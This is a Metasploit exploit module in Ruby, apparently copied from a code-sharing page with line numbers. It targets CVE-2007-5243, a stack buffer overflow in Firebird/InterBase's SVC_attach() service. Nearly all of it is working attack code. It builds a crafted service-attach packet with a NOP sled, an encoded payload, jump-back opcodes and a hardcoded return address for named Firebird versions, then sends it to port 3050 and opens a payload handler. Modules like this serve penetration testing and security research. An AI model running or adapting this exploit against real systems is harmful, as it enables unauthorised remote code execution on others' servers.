Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::Remote::BruteTargets
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'		=> 'Firebird Relational Database SVC_attach() Buffer Overflow',
15
      'Description'	=> %q{
16
        This module exploits a stack buffer overflow in Borland InterBase
17
        by sending a specially crafted service attach request.
18
      },
19
      'Author'	=>
20
        [
21
          'Ramon de C Valle',
22
          'Adriano Lima <adriano[at]risesecurity.org>',
23
        ],
24
      'Arch'		=> ARCH_X86,
25
      'Platform'	=> 'win',
26
      'References'	=>
27
        [
28
          [ 'CVE', '2007-5243' ],
29
          [ 'OSVDB', '38605' ],
30
          [ 'BID', '25917' ],
31
          [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],
32
        ],
33
      'Privileged'	=> true,
34
      'License'	=> MSF_LICENSE,
35
      'Payload'	=>
36
        {
37
          'Space' => 256,
38
          'BadChars' => "\x00\x2f\x3a\x40\x5c",
39
          'StackAdjustment' => -3500,
40
        },
41
      'Targets'	=>
42
        [
43
          [ 'Brute Force', { } ],
44
          # 0x0040230b pop ebp; pop ebx; ret
45
          [
46
            'Firebird WI-V1.5.3.4870 WI-V1.5.4.4910',
47
            { 'Length' => [ 308 ], 'Ret' => 0x0040230b }
48
          ],
49
          # Debug
50
          [
51
            'Debug',
52
            { 'Length' => [ 308 ], 'Ret' => 0xaabbccdd }
53
          ],
54
        ],
55
      'DefaultTarget'	=> 1,
56
      'DisclosureDate'  => '2007-10-03'
57
    ))
58

59
    register_options(
60
      [
61
        Opt::RPORT(3050)
62
      ])
63
  end
64

65
  def exploit_target(target)
66

67
    target['Length'].each do |length|
68

69
      connect
70

71
      # Service attach
72
      op_service_attach = 82
73

74
      remainder = length.remainder(4)
75
      padding = 0
76

77
      if remainder > 0
78
        padding = (4 - remainder)
79
      end
80

81
      buf = ''
82

83
      # Operation/packet type
84
      buf << [op_service_attach].pack('N')
85

86
      # Id
87
      buf << [0].pack('N')
88

89
      # Length
90
      buf << [length].pack('N')
91

92
      # Nop block
93
      buf << make_nops(length - payload.encoded.length - 13)
94

95
      # Payload
96
      buf << payload.encoded
97

98
      # Jump back into the nop block
99
      buf << "\xe9" + [-260].pack('V')
100

101
      # Jump back
102
      buf << "\xeb" + [-7].pack('c')
103

104
      # Random alpha data
105
      buf << rand_text_alpha(2)
106

107
      # Target
108
      buf << [target.ret].pack('V')
109

110
      # Padding
111
      buf << "\x00" * padding
112

113
      # Database parameter block
114

115
      # Length
116
      buf << [1024].pack('N')
117

118
      # Random alpha data
119
      buf << rand_text_alpha(1024)
120

121
      sock.put(buf)
122

123
      #select(nil,nil,nil,4)
124

125
      handler
126

127
    end
128

129
  end
130
end
131

132